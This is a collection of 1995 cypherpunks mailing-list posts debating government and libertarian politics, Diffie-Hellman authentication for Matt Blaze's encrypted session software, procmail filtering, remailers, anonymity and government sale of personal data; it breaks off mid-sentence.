MIME-Version: 1.0
Content-Type: text/plain


I've just been informed that there's a reasonably confusing name
collision between my ESP and a working name for IPSP.

Grumble.

I'm easy.  ESP is now called ESM (encrypting session manager).  Everything
else is the same.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Mon, 30 Jan 95 12:23:48 PST
To: cypherpunks@toad.com
Subject: Re: "bad" government
In-Reply-To: <9501301859.AA24106@snark.imsi.com>
Message-ID: <199501302023.NAA29443@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Richard K. Moore says:
> libertarians might like the theoretical, abstract formula of "unregulated
> capital", but if you'd put down your Friedman long enough to read history,
> you'd know that it was a disaster.

Perry Metzger says:
> Before starting a giant flamewar here, let me simply note that some of
> us violently disagree with everything -- every last detail -- of what
> you have to say -- indeed, probably the majority of people here. Since
> this isn't a list for discussion of politics, I'll simply suggest that
> this isn't the right place to discuss this.

Some others of us, however, are very happy to see that there are 
people still subscribed to this list who don't buy into the tripe that
the "majority" of the people here try to pass off as a political philosophy.

This list _ought_ to be the wrong place for politics, but it is
disingenuous to imply that politics, and pretty nutty politics at that,
doesn't consume a hefty fraction of what this list spews out. The fact
that someone expressing a moderate viewpoint is in danger of being 
flambeed is the list's problem, not Mr. Moore's.

                                 -- Will





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Mon, 30 Jan 95 23:44:57 PST
To: rfb@lehman.com
Subject: Re: PFF's Magna Carta and the new netserfs
In-Reply-To: <9501301729.AA10636@cfdevx1.lehman.com>
Message-ID: <m0rZ2mP-0004INC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


>     From: "Ed Carp [khijol Sysadmin]" <erc@s116.slcslip.indirect.com>
>     Date: Mon, 30 Jan 1995 01:07:21 -0700 (MST)
>     
>     > I've never figured out why governments are made out to be so
>     > bad; guns, ok, but the problems of privacy we face on this list
>     > have little to do with that.  Corporations can be at least as
>     > bad - extreme government leads to socialism, which often retains
>     > some form of citizen-participation in decision-making; the
>     > corporate state, though, is exemplified in fascism, inherently
>     > much less concerned about citizen's rights.
> 
>     Extreme government leads to totalitarianism, not socialism.
> 
> This statement, as well as the one to which it is a response, confuse
> decision making forces in government and government control of
> economic forces.  Democratic socialism, totalitarian socialism,
> democratic capitalism and totalitarian capitalism are all possible, at
> least theoretically.  Moving beyond theory, one could easily claim
> that no truly {democratic,totalitarian,capitalist,socialist}
> society/economy has ever existed.

I'm not about to split hairs based on one's particular implementation of labels;
rather, I would say that the labels one gives to government don't really
matter.  The purpose of government is to maximize personal freedom while at
the same time minimizing the curtailment of the personal freedoms of others.
I don't think that you can have a meaningful yardstick other than this - it
covers economic as well as social issues.

>     Governments as a whole are seen to be "bad" because they
>     invariably undermine the right of the individual to make choices
>     for themselves.
> 
> Unrestrained economic powers (companies, corporations, whatever) have
> the same property.  This seemed to me to be a fundamental point that
> Rishab was making -- and one that is often ignored in discussions of
> economic libertarianism.

Agreed, but I don't see that that was the point Rishab was making.  Oh, well..
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Mon, 30 Jan 95 13:59:34 PST
To: jcorgan@aeinet.com
Subject: Smart Card architecture
In-Reply-To: <Chameleon.4.01.950129222758.jcorgan@comet.aeinet.com>
Message-ID: <199501302138.NAA00348@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


Johnathan Corgan <jcorgan@aeinet.com> writes:
> I've been searching around the 'net looking for online references to
> the actual protocols and methods used in smart card user authentication,
> but have found very little.  I understand from reading Schneier that

There is a group of people working on a set of de facto standards for
interfacing to smart tokens.  The idea is to come up with an API that
is mostly vendor and technology independent.  The "standard" will be
published as PKCS #11 when it's ready, and is known as "cryptoki",
pronounced crypto-key.  (Cryptographic Token Interface, I think...)

I think that you can find a draft copy somewhere on ftp.rsa.com under
pkcs-11 or pkcs-11-dev.  There's also a mailing list. Send subscribe
request to pkcs-11-dev-request@rsa.com

Eric Blossom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 30 Jan 95 11:00:19 PST
To: rkmoore@iol.ie (Richard K. Moore)
Subject: Re: "bad" government
In-Reply-To: <199501301838.SAA20864@GPO.iol.ie>
Message-ID: <9501301859.AA24106@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Richard K. Moore says:
> The "Third Wave" -- if you take the PFF's Magna Carta definition (and
> Toffler is one of the authors) -- is a power grab by corporations to return
> the world economy to status of the USA economy in the 1880's. You so-called
> libertarians might like the theoretical, abstract formula of "unregulated
> capital", but if you'd put down your Friedman long enough to read history,
> you'd know that it was a disaster. Unregulated capitalism is incompatible
> with a civilized society.

Before starting a giant flamewar here, let me simply note that some of
us violently disagree with everything -- every last detail -- of what
you have to say -- indeed, probably the majority of people here. Since
this isn't a list for discussion of politics, I'll simply suggest that
this isn't the right place to discuss this.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 30 Jan 95 11:23:32 PST
To: Matt Blaze <mab@research.att.com>
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <9501301802.AA08512@merckx.info.att.com>
Message-ID: <Pine.SUN.3.91.950130141846.6455B-100000@zydeco.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Jan 1995, Matt Blaze wrote:

> And if you had a trusted secure key
> store on the remote host, you wouldn't really need to use Diffie-Hellman
> to establish the session key in the first place, since you could just
> store each user's pre-established session key in advance.

Right - using DH exchange is probably appropriate in situations where
there are no pre-established credentials for the party on the other
machine.  Inter-domain authentication while possible in theory is not
often carried out to any great extent in reality.  Companies don't trust
each other, or at least are not concerned by this lack of security for
inter-domain communications. 

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Mon, 30 Jan 95 15:09:49 PST
To: cypherpunks@toad.com
Subject: RE: "bad" government
Message-ID: <199501302310.PAA13622@mail.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


> Subject:       RE: "bad" government
> Cc:            cypherpunks@toad.com

> From: Richard K. Moore
> 
> >This has always been the case throughout history - the forces of dark, of
>> disinformation, have always attempted to keep true power from the hands of
>> the people.
> 
>> So why are you on the wrong side?
> .............................................................
> 
> So considering the political consequences from the use of cryptography, 
> as continuously elaborated upon here, what are you doing on this list  
> -  learning how to achieve a libertarian ideal?
> 
>     ..
> Blanc
> 

Do you assume privacy and protection from arbitrary power are solely 
libertarian concerns?  If so, educate yourself and check out the ACLU 
and Amnesty International ...

I even know lots of crypto-anarcho-libbers [or whatever Tim May is 
calling them nowadays ;-] who are willing to concede, under pressure, 
that unfettered corporations can be as dangerous to freedom as any 
government.

So encrypt away, guys, and I'll keep telling *my* compatriots that no, 
"the modem in Washington" didn't rig all the vote-counting computers 
in the last election.  I'm relying on you-all to keep it that way, 
while others try to make/keep voting meaningful.  It's called 
division of labor ...
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Turner <turner@telecheck.com>
Date: Mon, 30 Jan 95 13:00:19 PST
To: cypherpunks@toad.com
Subject: Where is the Line Between Public and Private Data?
Message-ID: <9501302100.AA05636@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text


I found an interesting article in Beyond Computing.  The article,
entitled "Where Is the Line Between Public and Private Data?" written
by Dr. H. Jefferson Smith, may be of some interest to those on the list.

The article basically hashes over the Government's trend in selling data
about its citizens to companies.  While I knew various state agencies
sold driver's license data to credit card companies, I had no idea about
the depth of what is going on.

The U.S. Postal Service is selling the NCOA (National Change of Address)
data to credit card companies.  Some junk-mailing lists are also 
produced.

Drivers license data is used by marketing companies, to target specific
sections of the public (ie, people who wear glasses, short people,
etc.).

--Begin Excerpt--
"Here's another example.  In 1992, it was reported that voter records in
a certain county were for sale on a CD-ROM disk (1.25 million voter
records were priced at $99).  The disk contained names, addresses,
phone numbers (in some cases, unlisted numbers), occupations, political
affiliations, birthplaces and birth dates.  Another company sold a CD
database that contained information from deed filings: the owner's name
and address, when the property was purchased, the number of bathrooms
and bedrooms in the house, the square footage and property assessments."
--End excerpt

What surprises me is that if I had the first CD-ROM, it would be very
easy for me to apply for credit cards in other peoples names... I
shudder to think...

The article goes on to further explain the government's lusts over
private databases and "'The only reason you should fear the use of such
records is if you have something to hide' is an often-heard argument."

 
-- 
Joe N. Turner		Telecheck International
turner@telecheck.com    5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659
compu$erv: 73301,1654	(800) 888-4922  *   (713) 439-6597
Finger for PGP KEY.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nobody@eniac.ac.siue.edu (Anonymous)
Date: Mon, 30 Jan 95 14:05:21 PST
To: cypherpunks@toad.com
Subject: Charon remailer
Message-ID: <199501302157.PAA12043@eniac.ac.siue.edu>
MIME-Version: 1.0
Content-Type: text/plain


A new cypherpunk remailer is up on charon@styx.jpunix.com. Attached is the
key.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 30 Jan 95 13:05:57 PST
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <Pine.SUN.3.91.950130141846.6455B-100000@zydeco.src.umd.edu>
Message-ID: <9501302104.AA24274@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Thomas Grant Edwards says:
> Right - using DH exchange is probably appropriate in situations where
> there are no pre-established credentials for the party on the other
> machine.

D-H also provides perfect forward secrecy, which is a reason to use it
even if there is already an established set of credentials.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Mon, 30 Jan 95 15:46:20 PST
To: cypherpunks@toad.com
Subject: Re: hacker search
In-Reply-To: <9501271329.AA26776@anon.penet.fi>
Message-ID: <Pine.SUN.3.91.950130162021.23037B-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Jan 1995, beacher wrote:

> Cunningham said Mitnick is a ham radio enthusiast and is believed to use a
> scanner to keep track of police in the area where he is hiding.

I do hope that he was called an Amateur ("ham") because he really is
one (and what is the relevance?), and not because he happened to have
a scanner...

There's been lots of media reports equating scanner-listeners with
Amateur radio enthusiasts (and the media wonder why they are despised).

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Mon, 30 Jan 95 13:32:13 PST
To: Blanc Weber <blancw@microsoft.com>
Subject: Re: "bad" government
In-Reply-To: <9501301933.AA27413@netmail2.microsoft.com>
Message-ID: <9501302131.AA01163@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    From: Blanc Weber <blancw@microsoft.com>
    Date: Mon, 30 Jan 95 11:22:38 PST
	
    So considering the political consequences from the use of cryptography, 
    as continuously elaborated upon here, what are you doing on this list  
    -  learning how to achieve a libertarian ideal?

As is often stated here, people with very widely varying political
views are interested enough in cryptography to seek out the handful of
messages on this list which address that subject :-)

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Mon, 30 Jan 95 17:41:22 PST
To: cypherpunks@toad.com
Subject: RE: "bad" government
Message-ID: <9501310141.AA29419@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Richard F. Dutcher"

Do you assume privacy and protection from arbitrary power are solely
libertarian concerns?  If so, educate yourself and check out the ACLU
and Amnesty International ...
..................................................

You can check out each group, each organization, each institution, etc. 
one by one, and eventually arrive at the realization that it's a matter 
of principle.    Anyone can make your life hell, even the "good guys" 
who are supposed to know better and whose talents are engaged 
supposedly for the support of great ideals.

"Oh Liberty, what crimes have been committed in your name."

    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 30 Jan 95 18:28:17 PST
To: cypherpunks@toad.com
Subject: Re: ESP Unix encrypted session protocol software
Message-ID: <9501310159.AA00485@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> How to do authentication of DH sessions  - it's hard to store
> a private-key safely on a multi-user server.

For now, let's look at this as client-server, rather than peer-peer.
One direction of authentication isn't too hard - the remote
client can authenticate his half with a PGP (or equivalent) public key,
and the server can keep a cache of known clients' public keys,
plus maybe have a good connection to a key server, and use web-of-trust
to help fill in the gaps.  (Getting all the details right is annoying...)
(And it increases the protocol a lot, involves post-1997 patent control,
and invokes PGP-vs.-RIPEM Public-Key-Implementation political wars.
But it's all an exercise for the reader :-)

One way to resolve the server direction is to hand-wave it away -
the authentication problem you need to solve is the man-in-the-middle;
man-at-the-end is a different problem.  After all, if the Bad Guys can 
break into the server well enough to steal root's private key,
the server is hosed anyway, and untrustable.  (The variant where the
server process is user-owned rather than root is really no different.)

If there _is_ another way to solve the server direction, it's to
do something like input the server's private key or the secret key
for root's private-key keyring into the process from a terminal
rather than a file, so it isn't stored on disk anywhere;
not a big win, but it's something.

An alternative to server authentication is to use a well-known published
half-key for the server end.  (Obviously the server still needs to keep
x private while publishing g**x mod m, but that's hard anyway.)
The client doesn't have to authenticate it, since it's well-known,
though it could be signed with a key not stored on the server,
and the server can authenticate the client's signed half-key,
so the man-in-the-middle is still unable to fake the session.
People have discussed how much this reduces security; I don't remember
the conclusions.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Mon, 30 Jan 95 15:07:50 PST
To: Cypherpeople <cypherpunks@toad.com>
Subject: Better living through `procmail'
Message-ID: <Pine.SUN.3.91.950130180105.27139A-100000@unix2.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain



-- excerpt from /home/grendel/.procmailrc --
:2:
(^From owner-cypherpunks@toad.com|^Sender: owner-cypherpunks@toad.com)
^Subject:.*alt.religion.your.operating.system.sucks
/dev/null

:3:
(^From owner-cypherpunks@toad.com|^Sender: owner-cypherpunks@toad.com)
^From:.*perry@imsi.com
^In-Reply-To:.*netcom.com
/dev/null

:3:
(^From owner-cypherpunks@toad.com|^Sender: owner-cypherpunks@toad.com)
^From:.*jamesd@netcom.com
^In-Reply-To:.*imsi.com
/dev/null

:1:
(^From owner-cypherpunks@toad.com|^Sender: owner-cypherpunks@toad.com)
$LISTDIR/cypherpunks
-- end excerpt --

Apply and modify as necessary. The "kill Perry's replies to James" 
recipe is a bit lossy, (i.e. it will kill anything that Perry replies 
to from Netcom on the cpunks list) but we can't have everything can 
we? 

Cheers!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkmoore@iol.ie (Richard K. Moore)
Date: Mon, 30 Jan 95 10:39:24 PST
To: cypherpunks@toad.com
Subject: "bad" government
Message-ID: <199501301838.SAA20864@GPO.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain



>From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])

>Governments as a whole are seen to be "bad" because they invariably undermine
the right of the individual to make choices for themselves.

Quite untrue. It's society which provides you with an environment in which
you have choices. And it's government which orders that society. It's
because government has served you so well, that you have the luxury to
fantasize you don't need it. You're being duped.

---

>The so-called "Third Wave" has nothing to do with government and everything to
do with the empowerment of the individual.  Some seem to not recognize that.

The "Third Wave" -- if you take the PFF's Magna Carta definition (and
Toffler is one of the authors) -- is a power grab by corporations to return
the world economy to the status of the USA economy in the 1880's. You so-called
libertarians might like the theoretical, abstract formula of "unregulated
capital", but if you'd put down your Friedman long enough to read history,
you'd know that it was a disaster. Unregulated capitalism is incompatible
with a civilized society.

---

>This has always been the case throughout history - the forces of dark, of
disinformation, have always attempted to keep true power from the hands of
the people.

So why are you on the wrong side?


-rkm

PS> If this list would like to see the full Magna Carta, or my
analysis/review of it ("Electric Dreams" sent you a few clips), please let
me know.



---

Richard K. Moore - rkmoore@iol.ie - Wexford, Ireland - fax +353 53 23970






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 30 Jan 95 15:38:48 PST
To: grendel@netaxs.com (Michael Handler)
Subject: Better living through better `procmail'
In-Reply-To: <Pine.SUN.3.91.950130180105.27139A-100000@unix2.netaxs.com>
Message-ID: <199501302338.SAA08570@bwnmr5.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	The rule below involves no loss, and it works quicker
by putting the whole cypherpunks thing inside a set of braces,
rather than checking each message 6 times to see if it's from the
cypherpunks list.

	Optimizing a bit more, you don't need a lockfile on
/dev/null, unless you want to make sure the messages go in as whole
units.  Also, there's no reason to send the whole message; we save time
by only sending the header to /dev/null.  Procmail just frees the
body.

	
:0
* (^From owner-cypherpunks@toad.com|^Sender: owner-cypherpunks@toad.com)
{
  :0 h
  * ^From:.*perry@imsi.com
  * ^(To|cc): jamesd@netcom.com
  /dev/null
...
}

| Apply and modify as necessary. The "kill Perry's replies to James" 
| recipe is a bit lossy, (i.e. it will kill anything that Perry replies 
| to from Netcom on the cpunks list) but we can't have everything can 
| we? 

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Barrett <barrett@daisy.ee.und.ac.za>
Date: Mon, 30 Jan 95 09:06:17 PST
To: Matt Blaze <mab@research.att.com>
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <9501301554.AA08155@merckx.info.att.com>
Message-ID: <Pine.NEB.3.91.950130184247.21652h@daisy.ee.und.ac.za>
MIME-Version: 1.0
Content-Type: text/plain


> Because of export restrictions (and a large cabal of paranoid, rabid
> lawyers watching my every move), I'm not able to send ESP out of the
> US or Canada or make it available by anonymous ftp.  Sorry.

Can you make the protocol specs available?

--apb (Alan Barrett)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Mon, 30 Jan 95 16:10:52 PST
To: msattler@jungle.com (Michael Sattler)
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <v03001109ab523a0cd3f8@[140.174.229.228]>
Message-ID: <m0rZ1X3-0009t3C@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


Maybe we're just in stego ... :-)

> Perhaps it's just me, but I thought the header that was substituted a few
> days ago was designed to be a subtle hit to the flamers.  Since it seems
> not to have worked, allow me to be a bit more explicit.
> 
> HEY, MORONS!  THIS IS AN ASSEMBLAGE OF PERSONS INTERESTED IN THE
> FURTHERANCE OF CRYPTOGRAPHY.  While it is true that to persons not familiar
> with a particular operating system, it may appear cryptic, this really
> isn't what cryptography is all about.  TAKE IT ELSEWHERE!
> 
> Thank you.  Have a nice day.  Teco rules!

And lives on in Emacs...

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewall/WWW srvrs ICBM/GPS: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W wrk
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.28Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Mon, 30 Jan 95 20:47:36 PST
To: Matt Blaze <tedwards@src.umd.edu>
Subject: Re: ESP Unix encrypted session protocol software
Message-ID: <ab536a4f010210046459@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 10:02 AM 1/30/95, Matt Blaze wrote:
....>As for the alternatives, I think the picture is pretty bleak, to tell
>the truth.  The cryptographically sound way to prevent spoofing is
>with authentication of the agreed key.  But for the remote host to
>authenticate itself, it has to have a secret signature key.  Where to
>store it?  A typical machine, especially a multi-user, unattended server
>simply has no safe place to store keys.
....
There would be on a secure "multi-user, unattended server". They are not
easy to come by and they aren't really Unix. I don't get on my soap box very
often but I couldn't resist your excellent opportunity. I think that
security requires good crypto and good OS security. There are Orange book
rated systems that are rated to run hostile software in the same machine
with Top Secret information.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Feuer <adamfast@seanet.com>
Date: Mon, 30 Jan 95 22:23:10 PST
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: PGP/crypto XCMDs for hypercard...
Message-ID: <Pine.NXT.3.91.950130221702.3459H-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain



  anyone know if there are any PGP or general crypto XCMDs for hypercard? 
i'm prototyping a front-end to control some premail stuff and some secure 
WWW server apps, and it would be convenient to have something like this. 
  on related notes, anybody know about XCMDs that talk to MacTCP...? and 
can someone send me status or a pointer to the PGP library for windows?

  please reply to me personally; i'll summarize to the list.

-adam

Adam Feuer
adamfast@seanet.com
206-628-8813






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Mon, 30 Jan 95 23:50:22 PST
To: cypherpunks@toad.com
Subject: RE: "bad" government
Message-ID: <199501310751.XAA12750@mail.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain



>> Subject:       RE: "bad" government

>> From: "Richard F. Dutcher"
> 
>> Do you assume privacy and protection from arbitrary power are solely
>> libertarian concerns?  If so, educate yourself and check out the ACLU
>> and Amnesty International ...
> ..................................................
> 
> You can check out each group, each organization, each institution, etc. 
> one by one, and eventually arrive at the realization that it's a matter 
> of principle.    Anyone can make your life hell, even the "good guys" 
> who are supposed to know better and whose talents are engaged 
> supposedly for the support of great ideals.
> 
> "Oh Liberty, what crimes have been committed in your name."
> 
>     ..
> Blanc
> 

All too true.  What's your point?  Got a principle that *hasn't* been 
used/abused?

 
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: avi baumstein <avi@clas.ufl.edu>
Date: Mon, 30 Jan 95 20:22:41 PST
To: mossberg@wsj.com
Subject: No Subject
Message-ID: <199501310422.XAA28500@cutter.clas.ufl.edu>
MIME-Version: 1.0
Content-Type: text/plain


sandrew@ufl.edu, dart@freenet.ufl.edu
Subject: WSJ column of 1-26-95


The following refers to the page B1 article in the January 26, 1995
column of The Wall Street Journal titled "Personal Technology" by
Walter S. Mossberg.

-----BEGIN PGP SIGNED MESSAGE-----

Mr. Mossberg:

Your editorial warning of the dangers of the online universe, while
well written, presents many arguments which do not make sense in
the current context of society or the Internet.

Your belief that anonymity is ruinous to on-line culture is based on
simply incorrect assumptions. The most egregrious of these is that
anonymity is anti-democratic and not present in our non-digital
society. It is widely known that the Federalist Papers were published
under psuedonyms, as have many other works which our culture holds
dear (Samuel Clemmons' Mark Twain identity comes to mind). Anonymity
can be acheived in the written word very easily today, by simply not
signing a letter, and dropping it in the nearest mail box. The White
House is one of the biggest receipients of such anonymous mail.
Newspapers routinely publish anonymous articles, often credited to "AP
Newswire". Most editorials bear no author (although the editorial
board can be identified, who is to say which one of them, or even if
any of them wrote a specific piece?) It is not uncommon for letters to
the editor to be published unsigned, to protect the wishes of the
author. 

The corporation is a form of anonymity. The legal term used to
describe a corporation's name screams of anonymity: Fictitious Name.
Oil companies routinely print ads in major media under names such as
"Coalition to clean our beaches". These are not only anonymous, but
misleading. 
 
Yet given all these methods of anonymous publishing (in print,
none-the-less), our society has existed in it's present form for
several centuries. And I am sure that anonymity is by no means a
product of modern day America.

Your statement "Our democracy and society require accountability, not
anonymity." is 100 percent wrong. When you go into a voting booth, do
you sign your ballot? Our government is founded on anonymity, and
SHARED accountability. We are all responsible for what happens in this
country. Perfect accountability is actually acheived only in a
dictatorship, where it is known that only the dictator is calling the
shots. That's certainly not democracy. 

Anonymity has many positive uses. The most often mentioned is for
victims to be able to discuss their problem without fear of
retribution or identification. There are many places on the Internet
where such discussions regularly take place. Another use can be where a
person wants their opinions to be judged on their merit, rather than
their name (have a look at The Economist, which does not publish
bylines, but yet it is extremely respected. Possibly there is some
connection here). Other uses can be whistleblowers; The state of
Florida maintains an anonymous hotline for government workers to tip
off the Comptroller about wastes and abuses. 

The bottom line is that anonymity, rather than being a bane to
democracy and freedom, is actually essential to the proper workings of
our society.

As a last example, I draw your attention to the lines that delineate
this email message. They proclaim that this document has been "PGP
signed". This is a technology that allows you (or anyone else) to
verify with almost certainty that it was I who wrote this letter. This
is a counterpart to anonymity in the on-line universe. Were I the
president, sending an official document, rather than believing the
name I signed or whomever my on-line service claimed to be, you could
independantly verify that that signature belonged to me, and that it
was indeed I who produced the contents of the message. 

There is no problem with anonymity OR accountability today, both work
perfectly fine, and serve their respective purposes.

Sincerely, 

- -avi

Avi Baumstein
avi@clas.ufl.edu


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLy25T/sIKWn2XtaVAQG5WgH/eNa8RZw4pfjccZJjZU3u2Y6aeulJa3T8
dDgkHr1vZxdCe7pii7CKpa+UKg6irpqwr6RUhYqCsq/svufmtdNkdw==
=kENj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: avi baumstein <avi@clas.ufl.edu>
Date: Mon, 30 Jan 95 20:25:15 PST
To: sandrew@ufl.edu
Subject: WSJ editorial on anonymity
Message-ID: <199501310425.XAA28642@cutter.clas.ufl.edu>
MIME-Version: 1.0
Content-Type: text/plain



The article from the January 26, 1995 Wall Street Journal titled
"Personal Technology" and dealing with the horrors of anonymity can be
found at:

	<http://www.clas.ufl.edu/~avi/NII/wsj_no-anon.html>

my response and other information regarding the NII can be found at:

	<http://www.clas.ufl.edu/~avi/NII>
-avi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Mon, 30 Jan 95 23:07:28 PST
To: cypherpunks@toad.com
Subject: Is the remailer crisis over?
Message-ID: <CeSBlKjqRGfK078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Well folks as of 11:30 on 1-30-94 there are 14 remailers with uptimes
greater than 99%. What's the consensus...Is the remailer crisis over?

Sam

--
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
           And God said: E = *mv* - Ze*/r ...and there *WAS* light!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@netcom.com
Date: Tue, 31 Jan 95 00:43:09 PST
To: Chris.Claborne@SanDiegoCA.ATTGIS.COM
Subject: The RSA FAQ on http://www.catalog.com/jamesd/rsafaq.html
Message-ID: <199501310841.AAA25011@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Chris converted the RSA FAQ to html for easy reading.

I have placed this faq on http://www.catalog.com/jamesd/rsafaq.html

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Mon, 30 Jan 95 21:48:38 PST
To: norm@netcom.com (Norman Hardy)
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <ab536a4f010210046459@DialupEudora>
Message-ID: <9501310546.AA09683@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain



>At 10:02 AM 1/30/95, Matt Blaze wrote:
>....>As for the alternatives, I think the picture is pretty bleak, to tell
>>the truth.  The cryptographically sound way to prevent spoofing is
>>with authentication of the agreed key.  But for the remote host to
>>authenticate itself, it has to have a secret signature key.  Where to
>>store it?  A typical machine, especially a multi-user, unattended server
>>simply has no safe place to store keys.
>....
>There would be on a secure "multi-user, unattended server". They are not
>easy to come by and they aren't really Unix. I don't get on my soap box very
>often but I couldn't resist your excellent opportunity. I think that
>security requires good crypto and good OS security. There are Orange book
>rated systems that are rated to run hostile software in the same machine
>with Top Secret information.
>
>

Sure, but as you point out in your second sentence, systems that are
